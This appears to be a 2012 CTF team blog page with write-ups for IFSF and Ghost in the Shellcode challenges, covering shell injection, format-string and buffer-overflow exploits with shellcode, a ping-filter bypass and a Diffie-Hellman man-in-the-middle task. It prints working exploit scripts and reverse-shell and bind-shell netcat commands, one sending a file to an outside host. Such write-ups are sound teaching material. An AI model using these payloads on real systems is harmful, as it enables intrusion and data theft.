A password-protected rar. Strangely, the flag can be seen in RAR comment, though it isn’t plain-text in the file.
If anyone knows why it’s like this, please leave a comment! :)
Flag: iojGRU84HXBYY3R6T

017

APL. Interpret using NARS2000, get flag: 42746658902357111317192329313741434753596167717379838997
(again numbers need to be written one after another)

IFSF CTF #8 (X98) Write-up

vos — Mon, 13 Feb 2012 10:52:26 +0000

we know it’s about some secret agents ,
but we need more than that

208.64.122.234
PORT 3000

X98 is a remote CTB task with a shell injection vuln.

The auth

When connected to the service, we get an auth request:

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 _    _  98   _________   ______   ______  _    _  _____  ______   ______
\ \  / /     | | | | | \ | |  | | | |     | |  | |  | |  | |  \ \ | |
 >|--|<      | | | | | | | |__| | | |     | |--| |  | |  | |  | | | |----
/_/  \_\     |_| |_| |_| |_|  |_| |_|____ |_|  |_| _|_|_ |_|  |_| |_|____
 
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 
#Only SAM is allowed
 
UserName : _

This may be a frustrating part, but there is no vuln. We just log in after several attempts (remember that only SAM is allowed :-)

UserName : SAM
Password : pass
 
Welcome SAM
 
> help
 
Display Agents Names  : agents
Show Agent Details    : details agent_name
Add Agent             : add <agent_name> <age> <origin>
Pending Data          : pending
Confirm modifications : confirm
 
> _

The possibilities

Service allows us to manage agent db: list agents,

> agents
john
james
jakob

view agent details,

> details james
Name : james - Age : 30 - Origin : RUSSIA - Home : home087

and also add agents (note <>‘s are actually required in add command)

> add <vos> <20> <leetmore>
 
Agent Added !
 
> pending
 
vos,20,leetmore,agent7585
 
 
> confirm
y/n ?
y
 
Writing agent details at file agent7585 with success
 
Confirmed

The weaknesses

First obvious weakness that we can try, is change the name of file that’s being written via comma injection:

> add <ololo> <trololo> <foo,../../../../../../etc/passwd>
 
Agent Added !
 
> pending
 
ololo,trololo,foo,../../../../../../etc/passwd,agent488
 
 
> confirm
y/n ?
y
 
Writing agent details at file ../../../../../../etc/passwd,agent488 with success
 
Confirmed

Ok, that seems to work, but doesn’t give us anything, let’s put it aside and find some other vuln.

For example, one can try bash injection using backticks:

> add <ololo> <trololo> <`sleep 10`>
 
Agent Added !
 
> confirm
y/n ?
y
 *** 10 seconds pass ***
Writing agent details at file agent6518 with success
 
Confirmed

w00t, that works! It’s really easy now to gain access, provided we have netcat on the system :-)
(their nc doesn’t support -e switch, so I had to use 2 connections)

> add <q> <q> <`nc 123.1.2.3 6666 | bash | nc 123.1.2.3 7777`>
 
Agent Added !
 
> confirm
y/n ?
y

The flag is ecd8d4580d8c03271933060c3084a5b1

Bonus

We also can download (and modify, due to poor permission settings) the service script itself.

ls -la
-r-xrwxr-x 1 x98  x98   3773 Feb 11 21:28 x.pl
nc 123.1.2.3 5555 < x.pl

Here it is :) x.pl

IFSF CTF 2012 #9 – X97

hellman — Mon, 13 Feb 2012 10:25:56 +0000

SSH : 208.64.122.235
guest:guest

binary

Category: exploitation
Summary: format string bug, ASLR and NX

Intro

The binary is simple – it just prints any line from a given file.

At first this challenge contained a hard version of binary: it dropped effective UID to guest, so we needed to make setuid(X79) before executing bash (we could do it, because SAVED UID was X79).

But later organizers decided that it’s too hard and posted a new binary without dropping privs. Funny, but it allowed to print a flag directly from file:

$ ./X79 FLAG_BABY
3V1L_D4NCE_X8

It was the first flag. Later organizers added again a “hard” version. Here’s what we have:

dr-------- 2 X79     X79      4096 2012-02-13 12:27 FLAG
-rwsr-xr-x 1 X79     X79      6457 2012-02-13 12:24 X79

Searching for bug

Decompiled source is pretty easy:

int main(int argc, char * argv;) {  
  int i;
  char s[116];
  FILE * fd;
 
  seteuid(502);
 
  char *format = (char *)malloc(strlen(argv[0]) + 400);
  if (argc == 2) {
    fd = fopen(argv[1], "r");
    if (!fd) exit(0);
    srand(time(0));
    for (i = rand() % 10 + 1; i && fgets(&s, 100, fdd); --i);
  }
  else if (argv <= 2) {
      snprintf(format, strlen(format) - 1, "Usage %s: filename [line]\n", argv[0]);
      printf(format);
      exit(0);
  }
  else {
    fd = fopen(argv[1], "r");
    if (!fd)
      exit(0);
    for (i = atoi(argv[2]) % 10; i && fgets(&s, 100, fd); --i);
  }
  printf("Quote of the day: %s", &s);
  return 0;
}

You see – here we have a formatstring vuln – format to printf is generated using argv[0]. Let’s check:

$ ln -s X79 '%p%p%p%p'
$ ./%p%p%p%p 
Usage ./0xffffffff0x80488f20xbf9a78dc0xb77f0ad0: filename [line]

Yeah it works!

Looking around

We have ASLR here, and the stack is NX. Well, ASLR is rather disturbing: we don’t have any data in main‘s stackframe (our part of formatstring is in argv[0]), so argument numbers pointing to our data aren’t constant and have some variation. This problem can be solved by placing a lot of addresses in some ENV variable:

$ export ADDR="`perl -e 'print "A"x8000 . "B"x8000 . "1"x8000 . "2"x8000;'`"

So we can take 1000th argument, then the next is 3000th and so on. Most probably we’ll get into our addresses.

A good thing is that we have a neat trick to disable libc ASLR:

$ ulimit -s unlimited
$ ldd ./X79
	linux-gate.so.1 =>  (0x40020000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x4003a000)
	/lib/ld-linux.so.2 (0x40000000)
$ ldd ./X79
	linux-gate.so.1 =>  (0x40020000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x4003a000)
	/lib/ld-linux.so.2 (0x40000000)

Exploiting 1

Let’s first try to launch a shell, without doing setuid(X79). Luckily dynamic section is writable here, so we can use dynamic->.fini.

We can use this nice piece of code:

.text:080487F7  mov     dword ptr [esp], offset aQuoteOfTheDayS ; "Quote of the day: %s"
.text:080487FE  call    _printf

The plan is to overwrite:

fini -> 080487F7
printf@got -> execl@libc

For generating the payload, i’ll use a bit modified version of libformatstr:

#$ objdump -d /lib/i386-linux-gnu/libc.so.6 | grep 'execl>:'
#0009bc20 :
libc = 0x4003a000
execl = 0x009bc20 + libc
fini = 0x80499c0
printf_quote = 0x080487F7
got_printf = 0x8049A98
 
p = FormatStr(200)
p[fini] = printf_quote
p[got_printf] = execl
 
...

Full code

Also we need a wrapper to execute:

//gcc x.c -o x
int main(int argc, char ** argv) {
  execl("./X79", argv[1], NULL);
}

Here’s produced payload:

$ py easy.py 
export ADDR="`perl -e 'print "\xc2\x99\x04\x08"x2000 . "\x9a\x9a\x04\x08"x2000 . "\x98\x9a\x04\x08"x2000 . "\xc0\x99\x04\x08"x2000;'`"
./x '%2000$08xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
./x '%2046c%2000$hn%14345c%4000$hn%7187c%6000$hn%11223c%8000$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

Let’s try it:

$ cat >'Quote of the day: %s'
#!/bin/bash -p
bash -p
$ chmod +x 'Quote of the day: %s' 
$ export PATH=".:$PATH"
$ export ADDR="`perl -e 'print "\xc2\x99\x04\x08"x2000 . "\x9a\x9a\x04\x08"x2000 . "\x98\x9a\x04\x08"x2000 . "\xc0\x99\x04\x08"x2000;'`"xx  # added xx because of wrong padding
$ ./x '%2000$08xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
Usage 080499c2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: filename [line]
$ ./x '%2046c%2000$hn%14345c%4000$hn%7187c%6000$hn%11223c%8000$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
bash-4.2$ id
uid=502(guest) gid=502(guest) groups=502(guest)

Oh, we did it! But privs are dropped.. Funny, there was an easy way to avoid this.
We could exploit easy version, which doesn’t drop privs and get UID=X97 (or even easier, there was another account added by organizers: guest2 (why??)).
So, the X79 binary wouldn’t be able to change seteuid to guest (because we are not guest). And we’ll get a good shell:

$ ./x '%2046c%2000$hn%14345c%4000$hn%7187c%6000$hn%11223c%8000$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
bash-4.2$ id
uid=504(guest2) gid=504(guest2) euid=503(X79) groups=503(X79)

Ok, not let’s try to solve it in a right way.

Exploiting 2

It’s supposed that we need to set uid/euid before calling execl. We can try to find ways to call mprotect and run shellcode, but there’s another tricky way:

.text:08048631  mov     dword ptr [esp], 0 ; timer
.text:08048638  call    _time
.text:0804863D  mov     [esp], eax      ; seed
.text:08048640  call    _srand
.text:08048645  call    _rand

Just a simple piece of code, isn’t it? :)
Hehe, we can use it to make setuid(503) and execl(“Quote of the day: %s”):
It’s easy to see that srand‘s argument is a result of time(0). If we can control time(0), we can change srand to setuid and rand to printf_quote.

But what libc function’s result we can control, assuming its argument is 0? A good choice is dup(0): we can open 502 descriptors, and dup(0) will return 503 after that.

So, the plan is to overwrite:

time@got -> dup@libc
srand@got -> setuid@libc
rand@got -> printf_quote
fini -> 0x080487F0  <- also make the second argument valid pointer
printf@got -> execl@libc

That’s rather tricky! We also need to change our wrapper:

int main(int argc, char ** argv) {
  while (dup(0) != 502);
  execl("./X79", argv[1], NULL);
}

Here’s exploit:

libc = 0x4003a000
execl = 0x009bc20 + libc
setuid = 0x009c470 + libc
dup = 0x00c1c50 + libc
 
fini = 0x80499c0
printf_quote = 0x080487F0  # need a valid second pointer too
time_srand = 0x08048631
 
got_printf = 0x8049A98
got_srand = 0x8049A84
got_time = 0x8049AA0
got_rand = 0x8049AA8
 
p = FormatStr(200)
p[got_time] = dup
p[got_srand] = setuid
p[got_rand] = printf_quote
p[fini] = time_srand
p[got_printf] = execl
...

Full code

$ id
uid=502(guest) gid=502(guest) groups=502(guest)
$ ulimit -s unlimited
$ export PATH=".:$PATH"
$ python hard.py 
export ADDR="`perl -e 'print "\xc2\x99\x04\x08"x2000 . "\xaa\x9a\x04\x08"x2000 . "\x86\x9a\x04\x08"x2000 . "\x9a\x9a\x04\x08"x2000 . "\xa2\x9a\x04\x08"x2000 . "\x98\x9a\x04\x08"x2000 . "\x84\x9a\x04\x08"x2000 . "\xc0\x99\x04\x08"x2000 . "\xa8\x9a\x04\x08"x2000 . "\xa0\x9a\x04\x08"x2000;'`"
./x '%2000$08xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
./x '%2046c%2000$hn%4000$hn%14345c%6000$hn%8000$hnAA%10000$hn%7185c%12000$hn%2128c%14000$hn%8641c%16000$hn%447c%18000$hn%13408c%20000$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
$ export ADDR="`perl -e 'print "\xc2\x99\x04\x08"x2000 . "\xaa\x9a\x04\x08"x2000 . "\x86\x9a\x04\x08"x2000 . "\x9a\x9a\x04\x08"x2000 . "\xa2\x9a\x04\x08"x2000 . "\x98\x9a\x04\x08"x2000 . "\x84\x9a\x04\x08"x2000 . "\xc0\x99\x04\x08"x2000 . "\xa8\x9a\x04\x08"x2000 . "\xa0\x9a\x04\x08"x2000;'`"
$ ./x '%2000$08xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
Usage 080499c2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: filename [line]
$ ./x '%2046c%2000$hn%4000$hn%14345c%6000$hn%8000$hnAA%10000$hn%7185c%12000$hn%2128c%14000$hn%8641c%16000$hn%447c%18000$hn%13408c%20000$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
...
bash-4.2$ id
uid=502(guest) gid=502(guest) euid=503(X79) groups=503(X79),502(guest)
bash-4.2$ ls -al FLAG/
ls: cannot access FLAG/.: Permission denied
ls: cannot access FLAG/SHIT_H4PP3N5_XD: Permission denied
ls: cannot access FLAG/..: Permission denied
total 0
d????????? ? ? ? ?                ? .
d????????? ? ? ? ?                ? ..
-????????? ? ? ? ?                ? SHIT_H4PP3N5_XD

Yeah! The second flag is: SHIT_H4PP3N5_XD.

Gits 2012 #13

zyx2145 — Sun, 05 Feb 2012 07:13:54 +0000

File was running at kimjongun.final2012.ghostintheshellcode.com : 2645

Summary: buffer overflow, reverse

File is a x86 ELF. First of all, it asks a password, but password could be anything except “HansBrix!!!”
And it has to be 0xc length.
Then, it is a usual buffer overflow task for warming up 
The main function has a buffer overflow.

signed int __cdecl check_func()
{
int flag; // edx@1
signed int result; // eax@1
char buffer[512]; // [sp+10h] [bp-208h]@1

memset(buffer, 0, sizeof(buffer));
SendToUser(fd, “Password: “);
ReadFromUser(fd, buffer, 0xCu, 10);
flag = strncmp(buffer, s2, 0xCu);
result = 1;
if ( flag )
{
SendToUser(fd, “Welcome shitty wok, may a taka oda prez?\n”);
ReadFromUser(fd, buffer, 0x240u, 0xAu);
SendToUser(fd, “Goddamn Mongorians! Quit breakin down my shitty wall!!!\n”);
result = 0;
}
return result;
}

And that is the exploit.

from socket import create_connection
import sys
import re
import time
 
if __name__ == "__main__":
   sock = create_connection(('kimjongun.final2012.ghostintheshellcode.com', 2645))
   print sock.recv(1024)
   fake = sys.stdin.readline()
   sock.send("HansBrix!!!\n")
   print sock.recv(1024)
   #0xbfe86d0c - ret addr
   payload =  "\x6A\x05\x5F\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a"
   payload += "\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
   payload += "\x89\xe3\x52\x53\x89\xe1\xcd\x80"
   #08048853 - jmp esp
   ret2 = '\x53\x88\x04\x08'
   buff = b'\x90'*(0x1fc-len(payload)) + payload + b'\x90'*0x10 + ret2 + payload + b'\x0a'
   sock.send(buff)
   buff =  b'ls -la' + b'\x0a'
   sock.send(buff)
   print sock.recv(1024)

But when you take shell it is a problem to find a key. Instead of key I found that photo of pretty guy from PPP :)

If you need a real key, you have to see a handle of open key file. Something like that =)

cat /proc/self/fd/4

Bingo!

Gits 2012 #12

zyx2145 — Sun, 05 Feb 2012 05:14:04 +0000

File was running at gratis.final2012.ghostintheshellcode.com:3030

Summary: reverse, x64, filtering parameters error

File is a x64 ELF. First of all, it ask a password:

If password is correct and equal “Start Gratis” the program gives several choses menu.

For us, the most interested function is “Ping” because we can control parameters with which it starts.

But there is an additional function (I called it filter) which filters parameters of ping start. It checks some set of forbidden symbols in parameters line. So we cannot use “`” “;” “|” “&”, but we can use “$”

Also, we gathered that we can use port 8081 by port scanning, so exploit is

from socket import create_connection
import sys
import re
import time
 
if __name__ == "__main__":
   sock = create_connection(("gratis.final2012.ghostintheshellcode.com", 3030))
   print sock.recv(1024)
   sock.send("Start Gratis\n")
   print sock.recv(1024)
   sock.send("7\n")
   print sock.recv(1024)
   req = '$(nc -lp 8081 -esh)\n'
   print req
   sock.send(req)
   print sock.recv(1024)

That is all now we have backconnection.

Gits 2012 # – Crypto 400

hellman — Mon, 30 Jan 2012 18:20:24 +0000

files running at hellothere.final2012.ghostintheshellcode.com

Summary: MITM attack

Here we have server and client source, both with bind sockets. It’s rather suspisious.

The scheme

The scheme is modified Diffie-Hellman:

We know only g and p.
r,s,t are random in each session.
h is known both to server and client.

server -> client: g^r % p, g^s % p
client -> server: (g^r)^h % p, g^t % p
server checks inputs, and generates shared key = (g^r)^h * (g^t)^s % p = g^(r*h+s*t) % p.

MITM attack

So, there are two ports: 9998 for server and 9999 for client. Let’s realize MITM attack:

Get g^r % p, g^s % p from server, and held the connect.
Send them both to client, and get right numbers

Now, if we send these two numbers to the server, we won’t be able to calculate the shared key – we can’t calculate g^(s*t) % p part. Let’s look into checking code:

(ans,d)=self.recv(2)
if(ans==pow(entA,r,field)):
	#print "Authenticated"
	key=(entA*pow(d,s,field))%field # < - - - - - -
	calcIv= hashlib.sha256()
	calcIv.update(hex(key))
	calcKey= hashlib.sha512()
	calcKey.update(hex(key))
	enc=AES.new(calcKey.digest()[0:32],2,calcIv.digest()[:16])
 
	self.request.sendall(enc.encrypt(winningKey))

We can fool the server! It only checks the first number (ans), the second (d) can be everything. Well, we can put 0 – then the key will be 0, so it will be easy to decrypt the message. Also 1 is a case (then the key is just first number from client):

SERV = sock("hellothere.final2012.ghostintheshellcode.com", 9998)
CLI = sock("hellothere.final2012.ghostintheshellcode.com", 9999)
 
gr, gs = recv(SERV, 2)
 
send(CLI, gr, gs)
ghr, gt = recv(CLI, 2)
 
send(SERV, ghr, 0)
 
cipher = SERV.recv(4096)
 
key = long(0)  # it will has 'long' type after computations
calcIv= hashlib.sha256()
calcIv.update(hex(key))
calcKey= hashlib.sha512()
calcKey.update(hex(key))
enc=AES.new(calcKey.digest()[0:32],2,calcIv.digest()[:16])
print enc.decrypt(cipher)

The flag: __It’s Better left unread__

Leet More

Russian Spy in Santa Barbara

SIMD [250] (Pirating)

PlaidCTF 2012 – RSA [200] (Password Guessing)

PlaidCTF 2012 – Encryption Service [300] (Password Guessing)

PlaidCTF 2012 – Nuclear Launch Detected [150] (Password Guessing)

PlaidCTF 2012 – Format [99] (Pwnables)

PlaidCTF 2012 – Bouncer [250] (Practical Packets)

Программа RuCTF

NuitDuHack 2012 Prequals – Web3.ndh

NuitDuHack 2012 Prequals – executable1.ndh

NuitDuHack 2012 Prequals – sciteekadm.cap

NuitDuHack 2012 Prequals – executable2.ndh

CodeGate 2012 Quals – Binary 500

CodeGate 2012 Quals – Binary 400

CodeGate 2012 Quals – Binary 300

CodeGate 2012 Quals Forensic 500 Write-up

The container

The partition table

Bonus

CodeGate 2012 Quals Vuln500 Write-up

The vuln

The obstacles

Taking over the control

Flat Memory Model

The exploit

CodeGate 2012 Quals – Vuln 400

CodeGate 2012 Quals Net400 Write-up

Analyzing the attack

Extracting info, bit by bit

The flag

CodeGate 2012 Quals – Vuln 300

CodeGate 2012 Quals – Vuln 200

CodeGate 2012 Quals – Vuln 100

CodeGate 2012 Quals – Binary 200

IFSF CTF #7 (X99) Write-up

The setup

The time

The exploit

The flag

IFSF CTF Small Challenges (#4, #5, #6, #14, #15)

Contents

#4 ER

Solution

#5 Change

Solution

#6 Call me

Solution

#14 Seek me

Solution

#15 Embedded docs

001

002

003

004

005

006

007

008

009

010

011

012

013

014

015

016

017

IFSF CTF #8 (X98) Write-up

The auth

The possibilities

The weaknesses

Bonus

IFSF CTF 2012 #9 – X97

Intro

Searching for bug

Looking around

Exploiting 1

Exploiting 2

Gits 2012 #13